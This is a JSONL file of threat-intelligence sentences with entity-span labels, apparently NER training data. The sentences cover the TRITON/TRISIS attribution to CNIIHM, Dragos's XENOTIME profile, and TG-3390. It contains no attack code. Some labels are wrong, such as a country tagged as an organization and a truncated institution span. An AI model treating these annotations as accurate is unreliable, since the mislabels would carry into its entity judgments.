{"text": "Based on information gained from discussion with the initial TRITON / TRISIS responders and subsequent work on follow-on activity by this entity , Dragos developed a comprehensive ( public ) picture of adversary activity roughly matching FireEye \u2019s analysis published in April 2019 , described in various media .", "spans": [{"start": 61, "end": 67, "label": "Malware"}, {"start": 70, "end": 76, "label": "Malware"}, {"start": 147, "end": 153, "label": "Organization"}, {"start": 238, "end": 245, "label": "Organization"}]}
{"text": "At this stage , we have two similar , parallel constructions of events \u2013 the how behind the immediate deployment and execution of TRITON / TRISIS \u2013 yet dramatically different responses in terms of attribution and labeling .", "spans": [{"start": 130, "end": 136, "label": "Malware"}, {"start": 139, "end": 145, "label": "Malware"}]}
{"text": "Since late 2018 , based upon the most-recent posting , FireEye appears to have \u201c walked back \u201d the previously-used terminology of TEMP.Veles and instead refers rather cryptically to the \u201c TRITON actor \u201d , while Dragos leveraged identified behaviors to consistently refer to an activity group , XENOTIME .", "spans": [{"start": 55, "end": 62, "label": "Organization"}, {"start": 130, "end": 140, "label": "Organization"}, {"start": 188, "end": 194, "label": "Malware"}, {"start": 211, "end": 217, "label": "Organization"}, {"start": 294, "end": 302, "label": "Organization"}]}
{"text": "Given that both organizations appear to describe similar ( if not identical ) activity , any reasonable person could ( and should ) ask \u2013 why the inconsistency in naming and identification .", "spans": []}
{"text": "Aside from the competitive vendor naming landscape ( which I am not a fan of in cases on direct overlap , but which has more to say for itself when different methodologies are employed around similar observations ) , the distinction between FireEye and Dragos \u2019 approaches with respect to the \u201c TRITON actor \u201d comes down to fundamental philosophical differences in methodology .", "spans": [{"start": 241, "end": 248, "label": "Organization"}, {"start": 253, "end": 259, "label": "Organization"}, {"start": 295, "end": 301, "label": "Malware"}]}
{"text": "As wonderfully described in a recent public posting , FireEye adheres to a naming convention based upon extensive data collection and activity comparison , designed to yield the identification of a discrete , identifiable entity responsible for a given collection of activity .", "spans": [{"start": 54, "end": 61, "label": "Organization"}]}
{"text": "This technique is precise and praiseworthy \u2013 yet at the same time , appears so rigorous as to impose limitations on the ability to dynamically adjust and adapt to emerging adversary activity . ( Or for that matter , even categorize otherwise well-known historical actors operating to the present day , such as Turla . ) FireEye \u2019s methodology may have particular limitations in instances where adversaries ( such as XENOTIME and presumably TEMP.Veles ) rely upon extensive use of publicly-available , commonly-used tools with limited amounts of customization .", "spans": [{"start": 310, "end": 315, "label": "Organization"}, {"start": 320, "end": 327, "label": "Organization"}, {"start": 416, "end": 424, "label": "Organization"}, {"start": 440, "end": 450, "label": "Organization"}]}
{"text": "In such cases , utilizing purely technical approaches for differentiation ( an issue I lightly touched on in a recent post ) becomes problematic , especially when trying to define attribution to specific , \u201c who-based \u201d entities ( such as a Russian research institute ) .", "spans": []}
{"text": "My understanding is FireEye labels entities where definitive attribution is not yet possible with the \u201c TEMP \u201d moniker ( hence , TEMP.Veles ) \u2013 yet in this case FireEye developed and deployed the label , then appeared to move away from it in subsequent reporting .", "spans": [{"start": 20, "end": 27, "label": "Organization"}, {"start": 129, "end": 139, "label": "Organization"}, {"start": 161, "end": 168, "label": "Organization"}]}
{"text": "Based on the public blog post \u2013 which also indicated that FireEye is responding to an intrusion at a second facility featuring the same or similar observations \u2013 this is presumably not for lack of evidence , yet the \u201c downgrade \u201d occurs all the same .", "spans": [{"start": 58, "end": 65, "label": "Organization"}]}
{"text": "In comparison , XENOTIME was defined based on principles of infrastructure ( compromised third-party infrastructure and various networks associated with several Russian research institutions ) , capabilities ( publicly- and commercially-available tools with varying levels of customization ) and targeting ( an issue not meant for discussion in this blog ) .", "spans": [{"start": 16, "end": 24, "label": "Organization"}]}
{"text": "In personally responding to several incidents across multiple industry sectors since early 2018 matching TTPs from the TRITON / TRISIS event , these items proved consistent and supported the creation of the XENOTIME activity group .", "spans": [{"start": 119, "end": 125, "label": "Malware"}, {"start": 128, "end": 134, "label": "Malware"}, {"start": 207, "end": 215, "label": "Organization"}]}
{"text": "This naming decision was founded upon the underlying methodology described in the Diamond Model of intrusion analysis .", "spans": [{"start": 82, "end": 95, "label": "System"}]}
{"text": "As such , this decision does not necessarily refer to a specific institution , but rather a collection of observations and behaviors observed across multiple , similarly-situated victims .", "spans": []}
{"text": "Of note , this methodology of naming abstracts away the \u201c who \u201d element \u2013 XENOTIME may represent a single discrete entity ( such as a Russian research institution ) or several entities working in coordination in a roughly repeatable , similar manner across multiple events .", "spans": [{"start": 74, "end": 82, "label": "Organization"}]}
{"text": "Ultimately , the epistemic foundation of the behavior-based naming approach makes this irrelevant for tracking ( and labeling for convenience sake ) observations .", "spans": []}
{"text": "Much like the observers watching the shadows of objects cast upon the wall of the cave , these two definitions ( XENOTIME and TEMP.Veles , both presumably referring to \u201c the TRITON actor \u201d ) describe the same phenomena , yet at the same time appear different .", "spans": [{"start": 113, "end": 121, "label": "Organization"}, {"start": 126, "end": 136, "label": "Organization"}, {"start": 174, "end": 180, "label": "Malware"}]}
{"text": "This question of perception and accuracy rests upon the underlying epistemic framework and the goal conceived for that framework in defining an adversary : FireEye \u2019s methodology follows a deductive approach requiring the collection of significant evidence over time to yield a conclusion that will be necessary given the premises ( the totality of evidence suggests APTxx ) ; the Dragos approach instead seeks an inductive approach , where premises may all be true but the conclusion need not necessarily follow from them given changes in premises over time or other observations not contained within the set ( thus , identified behaviors strongly suggests an activity group , defined as X ) .", "spans": [{"start": 156, "end": 163, "label": "Organization"}, {"start": 381, "end": 387, "label": "Organization"}]}
{"text": "From an external analysts \u2019 point of view , the wonder is , which is superior to the other .", "spans": []}
{"text": "And my answer for this is : neither is perfect , but both are useful \u2013 depending upon your goals and objectives .", "spans": []}
{"text": "But rather than trying to pursue some comparison between the two for identification of superiority ( an approach that will result in unproductive argument and social media warring ) , the point of this post is to highlight the distinctions between these approaches and how \u2013 in the case of \u201c the TRITON actor \u201d \u2013 they result in noticeably different conclusions from similar datasets .", "spans": [{"start": 296, "end": 302, "label": "Malware"}]}
{"text": "One reason for the distinction may be differences in evidence , as FireEye \u2019s public reporting notes two distinct events of which they are aware of and have responded to related to \u201c the TRITON actor \u201d while Dragos has been engaged several instances \u2013 thus , Dragos would possess more evidence to cement the definition of an activity group , while FireEye \u2019s data collection-centric approach would require far more observations to yield an \u201c APT \u201d .", "spans": [{"start": 67, "end": 74, "label": "Organization"}, {"start": 187, "end": 193, "label": "Malware"}, {"start": 208, "end": 214, "label": "Organization"}, {"start": 259, "end": 265, "label": "Organization"}, {"start": 348, "end": 355, "label": "Organization"}]}
{"text": "Yet irrespective of this , it is confusing why the previously-declared \u201c TEMP \u201d category was walked back as this has led to not small amount of confusion \u2013 in both technical and non-technical audiences \u2013 as to just what FireEye \u2019s blog post refers .", "spans": [{"start": 220, "end": 227, "label": "Organization"}]}
{"text": "Thus respected journalists ( at least by me ) conflate the \u201c TRITON actor is active at another site \u201d with \u201c TRITON malware was identified at another site \u201d .", "spans": [{"start": 61, "end": 67, "label": "Malware"}, {"start": 109, "end": 115, "label": "Malware"}]}
{"text": "In this case , we \u2019re seeing a definite problem with the overly-conservative naming approach used as it engenders confusion in a significant subset of the intended audience .", "spans": []}
{"text": "While some may dismiss adversary or activity naming as so much marketing , having a distinct label for something allows for clearer communication and more accurate discussion .", "spans": []}
{"text": "Furthermore , conflating adversaries with tools , since tools can be repurposed or used by other entities than those first observed deploying them , leads to further potential confusion as the \u201c X actor \u201d is quickly compressed in the minds of some to refer to any and all instantiations of tool \u201c X \u201d .", "spans": []}
{"text": "Overall , the discussion above may appear so much splitting of hairs or determining how many angels can dance on the head of a pin \u2013 yet given the communicative impacts behind different naming and labeling conventions , this exploration seems not merely useful but necessary .", "spans": []}
{"text": "Understanding the \u201c how \u201d and \u201c why \u201d behind different entity classifications of similar ( or even the same ) activity allows us to move beyond the dismissive approach of \u201c everyone has their names for marketing purposes \u201d to a more productive mindset that grasps the fundamental methodologies that ( should ) drive these decisions .", "spans": []}
{"text": "TRITON Attribution : Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 95, "end": 101, "label": "Malware"}]}
{"text": "In a previous blog post we detailed the TRITON intrusion that impacted industrial control systems ( ICS ) at a critical infrastructure facility .", "spans": [{"start": 40, "end": 46, "label": "Malware"}, {"start": 71, "end": 97, "label": "System"}, {"start": 100, "end": 103, "label": "System"}]}
{"text": "We now track this activity set as TEMP.Veles .", "spans": [{"start": 34, "end": 44, "label": "Organization"}]}
{"text": "In this blog post we provide additional information linking TEMP.Veles and their activity surrounding the TRITON intrusion to a Russian government-owned research institute .", "spans": [{"start": 60, "end": 70, "label": "Organization"}, {"start": 106, "end": 112, "label": "Malware"}]}
{"text": "FireEye Intelligence assesses with high confidence that intrusion activity that led to deployment of TRITON was supported by the Central Scientific Research Institute of Chemistry and Mechanics ( CNIIHM ; a.k.a. \u0426\u041d\u0418\u0418\u0425\u041c ) , a Russian government-owned technical research institution located in Moscow .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 101, "end": 107, "label": "Malware"}, {"start": 129, "end": 193, "label": "Organization"}, {"start": 196, "end": 202, "label": "Organization"}, {"start": 212, "end": 218, "label": "Organization"}]}
{"text": "The following factors supporting this assessment are further detailed in this post .", "spans": []}
{"text": "We present as much public information as possible to support this assessment , but withheld sensitive information that further contributes to our high confidence assessment .", "spans": []}
{"text": "FireEye uncovered malware development activity that is very likely supporting TEMP.Veles activity .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 78, "end": 88, "label": "Organization"}]}
{"text": "This includes testing multiple versions of malicious software , some of which were used by TEMP.Veles during the TRITON intrusion .", "spans": [{"start": 91, "end": 101, "label": "Organization"}, {"start": 113, "end": 119, "label": "Malware"}]}
{"text": "Investigation of this testing activity reveals multiple independent ties to Russia , CNIIHM , and a specific person in Moscow .", "spans": [{"start": 85, "end": 91, "label": "Organization"}]}
{"text": "This person \u2019s online activity shows significant links to CNIIHM .", "spans": [{"start": 58, "end": 64, "label": "Organization"}]}
{"text": "An IP address registered to CNIIHM has been employed by TEMP.Veles for multiple purposes , including monitoring open-source coverage of TRITON , network reconnaissance , and malicious activity in support of the TRITON intrusion .", "spans": [{"start": 28, "end": 34, "label": "Organization"}, {"start": 56, "end": 66, "label": "Organization"}, {"start": 136, "end": 142, "label": "Malware"}, {"start": 211, "end": 217, "label": "Malware"}]}
{"text": "Behavior patterns observed in TEMP.Veles activity are consistent with the Moscow time zone , where CNIIHM is located .", "spans": [{"start": 30, "end": 40, "label": "Organization"}, {"start": 99, "end": 105, "label": "Organization"}]}
{"text": "We judge that CNIIHM likely possesses the necessary institutional knowledge and personnel to assist in the orchestration and development of TRITON and TEMP.Veles operations .", "spans": [{"start": 14, "end": 20, "label": "Organization"}, {"start": 140, "end": 146, "label": "Malware"}, {"start": 151, "end": 161, "label": "Organization"}]}
{"text": "While we cannot rule out the possibility that one or more CNIIHM employees could have conducted TEMP.Veles activity without their employer \u2019s approval , the details shared in this post demonstrate that this explanation is less plausible than TEMP.Veles operating with the support of the institute .", "spans": [{"start": 58, "end": 64, "label": "Organization"}, {"start": 96, "end": 106, "label": "Organization"}, {"start": 242, "end": 252, "label": "Organization"}]}
{"text": "During our investigation of TEMP.Veles activity , we found multiple unique tools that the group deployed in the target environment .", "spans": [{"start": 28, "end": 38, "label": "Organization"}]}
{"text": "Some of these same tools , identified by hash , were evaluated in a malware testing environment by a single user .", "spans": []}
{"text": "Malware Testing Environment Tied to TEMP.Veles .", "spans": [{"start": 36, "end": 46, "label": "Organization"}]}
{"text": "We identified a malware testing environment that we assess with high confidence was used to refine some TEMP.Veles tools .", "spans": [{"start": 104, "end": 114, "label": "Organization"}]}
{"text": "At times , the use of this malware testing environment correlates to in-network activities of TEMP.Veles , demonstrating direct operational support for intrusion activity .", "spans": [{"start": 94, "end": 104, "label": "Organization"}]}
{"text": "Four files tested in 2014 are based on the open-source project , cryptcat .", "spans": []}
{"text": "Analysis of these cryptcat binaries indicates that the actor continually modified them to decrease AV detection rates .", "spans": []}
{"text": "One of these files was deployed in a TEMP.Veles target \u2019s network .", "spans": [{"start": 37, "end": 47, "label": "Organization"}]}
{"text": "The compiled version with the least detections was later re-tested in 2017 and deployed less than a week later during TEMP.Veles activities in the target environment .", "spans": [{"start": 118, "end": 128, "label": "Organization"}]}
{"text": "TEMP.Veles \u2019 lateral movement activities used a publicly-available PowerShell based tool , WMImplant .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 67, "end": 77, "label": "System"}, {"start": 91, "end": 100, "label": "System"}]}
{"text": "On multiple dates in 2017 , TEMP.Veles struggled to execute this utility on multiple victim systems , potentially due to AV detection .", "spans": [{"start": 28, "end": 38, "label": "Organization"}]}
{"text": "Soon after , the customized utility was again evaluated in the malware testing environment .", "spans": []}
{"text": "The following day , TEMP.Veles again tried the utility on a compromised system .", "spans": [{"start": 20, "end": 30, "label": "Organization"}]}
{"text": "The user has been active in the malware testing environment since at least 2013 , testing customized versions of multiple open-source frameworks , including Metasploit , Cobalt Strike , PowerSploit , and other projects .", "spans": [{"start": 157, "end": 167, "label": "System"}, {"start": 170, "end": 183, "label": "System"}, {"start": 186, "end": 197, "label": "System"}]}
{"text": "The user \u2019s development patterns appear to pay particular attention to AV evasion and alternative code execution techniques .", "spans": []}
{"text": "Custom payloads utilized by TEMP.Veles in investigations conducted by Mandiant are typically weaponized versions of legitimate open-source software , retrofitted with code used for command and control .", "spans": [{"start": 28, "end": 38, "label": "Organization"}, {"start": 70, "end": 78, "label": "Organization"}]}
{"text": "Testing , Malware Artifacts , and Malicious Activity Suggests Tie to CNIIHM .", "spans": [{"start": 69, "end": 75, "label": "Organization"}]}
{"text": "Multiple factors suggest that this activity is Russian in origin and associated with CNIIHM .", "spans": [{"start": 85, "end": 91, "label": "Organization"}]}
{"text": "A PDB path contained in a tested file contained a string that appears to be a unique handle or user name .", "spans": [{"start": 2, "end": 5, "label": "System"}]}
{"text": "This moniker is linked to a Russia based person active in Russian information security communities since at least 2011 .", "spans": []}
{"text": "The handle has been credited with vulnerability research contributions to the Russian version of Hacker Magazine ( \u0445\u0430\u043a\u0435\u0440 ) .", "spans": []}
{"text": "According to a now-defunct social media profile , the same individual was a professor at CNIIHM , which is located near Nagatinskaya Street in the Nagatino-Sadovniki district of Moscow .", "spans": [{"start": 89, "end": 95, "label": "Organization"}]}
{"text": "Another profile using the handle on a Russian social network currently shows multiple photos of the user in proximity to Moscow for the entire history of the profile .", "spans": []}
{"text": "Suspected TEMP.Veles incidents include malicious activity originating from 87.245.143.140 , which is registered to CNIIHM .", "spans": [{"start": 10, "end": 20, "label": "Organization"}, {"start": 75, "end": 89, "label": "Indicator"}, {"start": 115, "end": 121, "label": "Organization"}]}
{"text": "This IP address has been used to monitor open-source coverage of TRITON , heightening the probability of an interest by unknown subjects , originating from this network , in TEMP.Veles related activities .", "spans": [{"start": 65, "end": 71, "label": "Malware"}, {"start": 174, "end": 184, "label": "Organization"}]}
{"text": "It also has engaged in network reconnaissance against targets of interest to TEMP.Veles .", "spans": [{"start": 77, "end": 87, "label": "Organization"}]}
{"text": "The IP address has been tied to additional malicious activity in support of the TRITON intrusion .", "spans": [{"start": 80, "end": 86, "label": "Malware"}]}
{"text": "Multiple files have Cyrillic names and artifacts .", "spans": []}
{"text": "Adversary behavioral artifacts further suggest the TEMP.Veles operators are based in Moscow , lending some further support to the scenario that CNIIHM , a Russian research organization in Moscow , has been involved in TEMP.Veles activity .", "spans": [{"start": 51, "end": 61, "label": "Organization"}, {"start": 144, "end": 150, "label": "Organization"}, {"start": 218, "end": 228, "label": "Organization"}]}
{"text": "We identified file creation times for numerous files that TEMP.Veles created during lateral movement on a target \u2019s network .", "spans": []}
{"text": "These file creation times conform to a work schedule typical of an actor operating within a UTC+3 time zone supporting a proximity to Moscow .", "spans": []}
{"text": "Additional language artifacts recovered from TEMP.Veles toolsets are also consistent with such a regional nexus .", "spans": [{"start": 45, "end": 55, "label": "Organization"}]}
{"text": "A ZIP archive recovered during our investigations , schtasks.zip , contained an installer and uninstaller of CATRUNNER that includes two versions of an XML scheduled task definitions for a masquerading service \u2018 ProgramDataUpdater . \u2019 The malicious installation version has a task name and description in English , and the clean uninstall version has a task name and description in Cyrillic .", "spans": [{"start": 2, "end": 5, "label": "System"}, {"start": 52, "end": 64, "label": "Indicator"}, {"start": 109, "end": 118, "label": "Malware"}, {"start": 152, "end": 155, "label": "System"}, {"start": 212, "end": 230, "label": "System"}]}
{"text": "The timeline of modification dates within the ZIP also suggest the actor changed the Russian version to English in sequential order , heightening the possibility of a deliberate effort to mask its origins .", "spans": [{"start": 46, "end": 49, "label": "System"}]}
{"text": "While we know that TEMP.Veles deployed the TRITON attack framework , we do not have specific evidence to prove that CNIIHM did ( or did not ) develop the tool .", "spans": [{"start": 19, "end": 29, "label": "Organization"}, {"start": 43, "end": 49, "label": "Malware"}, {"start": 116, "end": 122, "label": "Organization"}]}
{"text": "We infer that CNIIHM likely maintains the institutional expertise needed to develop and prototype TRITON based on the institute \u2019s self-described mission and other public information .", "spans": [{"start": 14, "end": 20, "label": "Organization"}, {"start": 98, "end": 104, "label": "Malware"}]}
{"text": "CNIIHM has at least two research divisions that are experienced in critical infrastructure , enterprise safety , and the development of weapons/military equipment :", "spans": [{"start": 0, "end": 6, "label": "Organization"}]}
{"text": "The Center for Applied Research creates means and methods for protecting critical infrastructure from destructive information and technological impacts .", "spans": [{"start": 0, "end": 31, "label": "Organization"}]}
{"text": "The Center for Experimental Mechanical Engineering develops weapons as well as military and special equipment .", "spans": [{"start": 0, "end": 50, "label": "Organization"}]}
{"text": "It also researches methods for enabling enterprise safety in emergency situations .", "spans": []}
{"text": "CNIIHM officially collaborates with other national technology and development organizations , including :", "spans": [{"start": 0, "end": 6, "label": "Organization"}]}
{"text": "The Moscow Institute of Physics and Technology ( PsyTech ) , which specializes in applied physics , computing science , chemistry , and biology .", "spans": [{"start": 24, "end": 46, "label": "Organization"}, {"start": 49, "end": 56, "label": "Organization"}]}
{"text": "The Association of State Scientific Centers \u201c Nauka , \u201d which coordinates 43 Scientific Centers of the Russian Federation ( SSC RF ) .", "spans": [{"start": 0, "end": 43, "label": "Organization"}, {"start": 46, "end": 51, "label": "Organization"}, {"start": 77, "end": 95, "label": "Organization"}, {"start": 103, "end": 121, "label": "Organization"}, {"start": 124, "end": 127, "label": "Organization"}, {"start": 128, "end": 130, "label": "Organization"}]}
{"text": "Some of its main areas of interest include nuclear physics , computer science and instrumentation , robotics and engineering , and electrical engineering , among others .", "spans": []}
{"text": "The Federal Service for Technical and Export Control ( FTEC ) which is responsible for export control , intellectual property , and protecting confidential information .", "spans": [{"start": 4, "end": 52, "label": "Organization"}, {"start": 55, "end": 59, "label": "Organization"}]}
{"text": "The Russian Academy of Missile and Artillery Sciences ( PAPAH ) which specializes in research and development for strengthening Russia \u2019s defense industrial complex .", "spans": [{"start": 4, "end": 53, "label": "Organization"}, {"start": 56, "end": 61, "label": "Organization"}]}
{"text": "Information from a Russian recruitment website , linked to CNIIHM \u2019s official domain , indicates that CNIIHM is also dedicated to the development of intelligent systems for computer-aided design and control , and the creation of new information technologies .", "spans": [{"start": 59, "end": 65, "label": "Organization"}, {"start": 102, "end": 108, "label": "Organization"}]}
{"text": "Some possibility remains that one or more CNIIHM employees could have conducted the activity linking TEMP.Veles to CNIIHM without their employer \u2019s approval .", "spans": [{"start": 42, "end": 48, "label": "Organization"}, {"start": 101, "end": 111, "label": "Organization"}, {"start": 115, "end": 121, "label": "Organization"}]}
{"text": "However , this scenario is highly unlikely .", "spans": []}
{"text": "In this scenario , one or more persons \u2013 likely including at least one CNIIHM employee , based on the moniker discussed above \u2013 would have had to conduct extensive , high-risk malware development and intrusion activity from CNIIHM \u2019s address space without CNIIHM \u2019s knowledge and approval over multiple years .", "spans": [{"start": 71, "end": 77, "label": "Organization"}, {"start": 224, "end": 230, "label": "Organization"}, {"start": 256, "end": 262, "label": "Organization"}]}
{"text": "CNIIHM \u2019s characteristics are consistent with what we might expect of an organization responsible for TEMP.Veles activity .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 102, "end": 112, "label": "Organization"}]}
{"text": "TRITON is a highly specialized framework whose development would be within the capability of a low percentage of intrusion operators .", "spans": [{"start": 0, "end": 6, "label": "Malware"}]}
{"text": "Xenotime .", "spans": [{"start": 0, "end": 8, "label": "Organization"}]}
{"text": "Release_Time : unknown", "spans": []}
{"text": "Report_URL : https://dragos.com/resource/xenotime/", "spans": []}
{"text": "XENOTIME is easily the most dangerous threat activity publicly known .", "spans": [{"start": 0, "end": 8, "label": "Organization"}]}
{"text": "It is the only activity group intentionally compromising and disrupting industrial safety instrumented systems , which can lead to scenarios involving loss of life and environmental damage .", "spans": []}
{"text": "Dragos identified several compromises of ICS vendors and manufacturers in 2018 by activity associated with XENOTIME , providing potential supply chain threat opportunities and vendor-enabled access to asset owner and operator ICS networks .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 41, "end": 44, "label": "System"}, {"start": 107, "end": 115, "label": "Organization"}, {"start": 226, "end": 229, "label": "System"}]}
{"text": "XENOTIME rose to prominence in December 2017 when Dragos and FireEye jointly published details of TRISIS destructive malware targeting Schneider Electric \u2019s Triconex safety instrumented system .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 50, "end": 56, "label": "Organization"}, {"start": 61, "end": 68, "label": "Organization"}, {"start": 98, "end": 104, "label": "Malware"}, {"start": 135, "end": 153, "label": "Organization"}, {"start": 157, "end": 165, "label": "System"}]}
{"text": "The multi-step malware framework caused industrial systems in a Middle Eastern industrial facility to shut down .", "spans": []}
{"text": "The incident represented a shift in the capabilities and consequences of ICS malware .", "spans": [{"start": 73, "end": 76, "label": "System"}]}
{"text": "TRISIS was an escalation of the type of attacks historically targeting ICS systems .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 71, "end": 74, "label": "System"}]}
{"text": "Targeting a safety system indicates significant damage and loss of human life were either intentional or acceptable goals of the attack , a consequence not seen in previous disruptive attacks such as the 2016 CRASHOVERRIDE malware that caused a power loss in Ukraine .", "spans": [{"start": 209, "end": 222, "label": "Malware"}]}
{"text": "Note : Industrial safety instrumented systems comprise part of a multi-layer engineered process control framework to protect life and environment .", "spans": []}
{"text": "Industrial safety systems are highly redundant and separate controls which override and manage industrial processes if they approach unsafe conditions such as over-pressurization , overspeed , or over-heating .", "spans": []}
{"text": "They enable engineers and operators to safely control and possibly shutdown processes before a major incident occurs .", "spans": []}
{"text": "They \u2019re a critical component of many dangerous industrial environments such as electric power generation and oil and gas processing .", "spans": []}
{"text": "XENOTIME configured TRISIS based on the specifics and functions of the Triconex system within the industrial control ( ICS ) environment .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 20, "end": 26, "label": "Malware"}, {"start": 71, "end": 79, "label": "System"}, {"start": 98, "end": 116, "label": "System"}, {"start": 119, "end": 122, "label": "System"}]}
{"text": "XENOTIME used credential capture and replay to move between networks , Windows commands , standard command-line tools such as PSExec , and proprietary tools for operations on victim hosts . ( Full reports detailing XENOTIME \u2019s tool techniques , and procedures are available to Dragos WorldView customers . ) Because the TRISIS malware framework was highly tailored , it would have required specific knowledge of the Triconex \u2019s infrastructure and processes within a specific plant .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 71, "end": 78, "label": "System"}, {"start": 126, "end": 132, "label": "System"}, {"start": 215, "end": 223, "label": "Organization"}, {"start": 277, "end": 283, "label": "Organization"}, {"start": 284, "end": 293, "label": "System"}, {"start": 320, "end": 326, "label": "Malware"}, {"start": 416, "end": 424, "label": "System"}]}
{"text": "This means it \u2019s not easy to scale\u2014however , the malware provides a blueprint of how to target safety instrumented systems .", "spans": []}
{"text": "This tradecraft is thus scalable and available to others even if the malware itself changes .", "spans": []}
{"text": "Dragos \u2019 data indicates XENOTIME remains active .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 24, "end": 32, "label": "Organization"}]}
{"text": "Furthermore , Dragos \u2019 analysis of the TRISIS event continues as we recover additional data surrounding the incident .", "spans": [{"start": 14, "end": 20, "label": "Organization"}, {"start": 39, "end": 45, "label": "Malware"}]}
{"text": "Dragos assesses with moderate confidence that XENOTIME intends to establish required access and capability to cause a potential , future disruptive\u2014or even destructive\u2014event .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 46, "end": 54, "label": "Organization"}]}
{"text": "Compromising safety systems provides little value outside of disrupting operations .", "spans": []}
{"text": "The group created a custom malware framework and tailormade credential gathering tools , but an apparent misconfiguration prevented the attack from executing properly .", "spans": []}
{"text": "As XENOTIME matures , it is less likely that the group will make this mistake in the future .", "spans": [{"start": 3, "end": 11, "label": "Organization"}]}
{"text": "XENOTIME operates globally , impacting regions far outside of the Middle East , their initial target .", "spans": [{"start": 0, "end": 8, "label": "Organization"}]}
{"text": "Intelligence suggests the group has been active since at least 2014 and is presently operating in multiple facilities targeting safety systems beyond Triconex .", "spans": [{"start": 150, "end": 158, "label": "System"}]}
{"text": "This group has no known associations to other activity groups .", "spans": []}
{"text": "Dragos threat intelligence leverages the Dragos Platform , our threat operations center , and other sources to provide comprehensive insight into threats affecting industrial control security and safety worldwide .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 41, "end": 47, "label": "Organization"}]}
{"text": "Dragos does not corroborate nor conduct political attribution to threat activity .", "spans": [{"start": 0, "end": 6, "label": "Organization"}]}
{"text": "Dragos instead focuses on threat behaviors and appropriate detection and response .", "spans": [{"start": 0, "end": 6, "label": "Organization"}]}
{"text": "Read more about Dragos \u2019 approach to categorizing threat activity and attribution .", "spans": [{"start": 16, "end": 22, "label": "Organization"}]}
{"text": "Dragos does not publicly describe ICS activity group technical details except in extraordinary circumstances in order to limit tradecraft proliferation .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 34, "end": 37, "label": "System"}]}
{"text": "However , full details on XENOTIME and other group tools , techniques , procedures , and infrastructure is available to network defenders via Dragos WorldView .", "spans": [{"start": 26, "end": 34, "label": "Organization"}, {"start": 142, "end": 148, "label": "Organization"}, {"start": 149, "end": 158, "label": "System"}]}
{"text": "Threat Group 3390 Cyberespionage .", "spans": [{"start": 0, "end": 17, "label": "Organization"}]}
{"text": "Dell SecureWorks Counter Threat Unit (TM ) ( CTU ) researchers investigated activities associated with Threat Group-3390 ( TG-3390 ) .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 5, "end": 36, "label": "Organization"}, {"start": 45, "end": 48, "label": "Organization"}, {"start": 103, "end": 120, "label": "Organization"}]}
{"text": "Analysis of TG-3390 's operations , targeting , and tools led CTU researchers to assess with moderate confidence the group is located in the People's Republic of China .", "spans": [{"start": 12, "end": 19, "label": "Organization"}, {"start": 62, "end": 65, "label": "Organization"}, {"start": 141, "end": 158, "label": "Organization"}]}
{"text": "The threat actors target a wide range of organizations : CTU researchers have observed TG-3390 actors obtaining confidential data on defense manufacturing projects , but also targeting other industry verticals and attacking organizations involved in international relations .", "spans": [{"start": 57, "end": 60, "label": "Organization"}, {"start": 87, "end": 94, "label": "Organization"}]}
{"text": "The group extensively uses long-running strategic web compromises ( SWCs ) , and relies on whitelists to deliver payloads to select victims .", "spans": []}
{"text": "In comparison to other threat groups , TG-3390 is notable for its tendency to compromise Microsoft Exchange servers using a custom backdoor and credential logger .", "spans": [{"start": 39, "end": 46, "label": "Organization"}, {"start": 89, "end": 98, "label": "Organization"}, {"start": 99, "end": 107, "label": "System"}]}
{"text": "CTU researchers divided the threat intelligence about TG-3390 into two sections : strategic and tactical .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 54, "end": 61, "label": "Organization"}]}
{"text": "Strategic threat intelligence includes an assessment of the ongoing threat posed by the threat group .", "spans": []}
{"text": "Executives can use this assessment to determine how to reduce risk to their organization's mission and critical assets .", "spans": []}
{"text": "Tactical threat intelligence is based on incident response investigations and research , and is mapped to the kill chain .", "spans": []}
{"text": "Computer network defenders can use this information to reduce the time and effort associated with responding to TG-3390 .", "spans": [{"start": 112, "end": 119, "label": "Organization"}]}
{"text": "CTU researchers assess with moderate confidence that TG-3390 is based in the People's Republic of China .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 53, "end": 60, "label": "Organization"}, {"start": 77, "end": 94, "label": "Organization"}]}
{"text": "CTU researchers have evidence that the threat group compromised U.S. and UK organizations in the following verticals : manufacturing ( specifically aerospace ( including defense contractors ) , automotive , technology , energy , and pharmaceuticals ) , education , and legal , as well as organizations focused on international relations .", "spans": [{"start": 0, "end": 3, "label": "Organization"}]}
{"text": "Based on analysis of the group's SWCs , TG-3390 operations likely affect organizations in other countries and verticals .", "spans": [{"start": 33, "end": 37, "label": "System"}, {"start": 40, "end": 47, "label": "Organization"}]}
{"text": "TG-3390 operates a broad and long-running campaign of SWCs and has compromised approximately 100 websites as of this publication .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 54, "end": 58, "label": "System"}]}
{"text": "Through an IP address whitelisting process , the threat group selectively targets visitors to these websites .", "spans": []}
{"text": "After the initial compromise , TG-3390 delivers the HttpBrowser backdoor to its victims .", "spans": [{"start": 31, "end": 38, "label": "Organization"}, {"start": 52, "end": 72, "label": "Malware"}]}
{"text": "The threat actors then move quickly to compromise Microsoft Exchange servers and to gain complete control of the target environment .", "spans": [{"start": 50, "end": 59, "label": "Organization"}, {"start": 60, "end": 68, "label": "System"}]}
{"text": "The threat actors are adept at identifying key data stores and selectively exfiltrating all of the high-value information associated with their goal .", "spans": []}
{"text": "CTU researchers recommend the following practices to prevent or detect TG-3390 intrusions :", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 71, "end": 78, "label": "Organization"}]}
